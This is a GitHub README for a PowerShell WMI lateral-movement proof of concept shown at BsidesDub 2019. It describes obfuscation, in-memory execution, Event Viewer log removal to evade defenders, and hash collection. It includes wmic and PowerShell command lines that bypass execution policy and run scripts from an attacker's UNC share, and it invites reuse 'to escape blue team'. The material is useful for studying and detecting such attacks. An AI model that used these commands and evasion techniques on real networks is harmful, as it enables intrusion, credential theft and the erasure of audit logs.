Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.

Fud WMI for lateral movement (PoC) - ##BsidesDub 2019##

Author: kmkz - @kmkz_security


This repository contains the PowerShell WMI based Proof of Concept for advanced lateral movement as presented at BsidesDub 2019.

The main goal of this project was to demonstrate the techniques an attacker might use to bypass detection mechanisms using many techniques in real-life condition.

It implement random class name derivation mechanism, payload obfuscation, in-memory execution without any call to IEX nor IWR for the stage 1 dropper and an EventViewer logs removal through WMI un-subscription method.

Additionally, it use WMI only (no WinRM) and do not interact with registry keys to avoid registry monitoring based detection.

Of course, feel free to reuse code parts for your own purpose in case of need to escape blue team or for simply test-it.


Stage 1 (executed on attacker's side):

The "stage 1" is a simple dropper for payload delivery through UNC/WebDAV using basic obfuscation (require admin. privs for RCE over WMI ofc).

It is executed from attackers station (C2C) to run in-memory fud PowerShell without the well-known IWR/IEX method calls.

[*] Notes:

UNC/WebDAV could be replaced by WMI namespaces as presented in WmiSploit project

However, the executed command is then limited to 8190 chars due to -EncodedCommand usage for b64 payload, this is the reason why I prefered this method for the PoC.

An important thing here is that .ps1 file is executed over WMI without invoke-expression (iex) nor wget/invoke-webrequest (iwr) method to prevent alerting.

Classic stager from command line: wmic.exe /node:"Victime-PC" /user:WORKGROUP\admin process call create "PowErSheLl -eXecUtIonpOliCY BypAsS -NopRofilE -fILe \\Vboxsvr\shared\BSIDESIE\class-derivation.ps1"

Stage 2 (executed on target):

In-memory build stage 2 using "-File" parameter (obfuscated PowerShell with random Class Derivation).

Randomly generated class derivation and "EventViewer" logs removing for detection mechanisms/blue team evasion.

Stage 1 execution is not removed from logs for debug purpose, it should be modified for a total discretion ;).

[*] Notes:

C2C shell could be used in combination to unicorn to obtains Meterpreter session (stage 2 could be modified depending on the use case):

    Examples: `powershell.exe -eXecUtIOnpOlICy BypAsS -File "\\Vboxsvr\shared\BSIDESIE\pwner.ps1"`

    IMPORTANT: Payload delivery using "-File" parameter also permit to add hashes collection when payload (stage 2) is triggered.

stage 3 (executed on target):

Payload execution and output push/pull via a random file located on attacker's server.



You can’t perform that action at this time.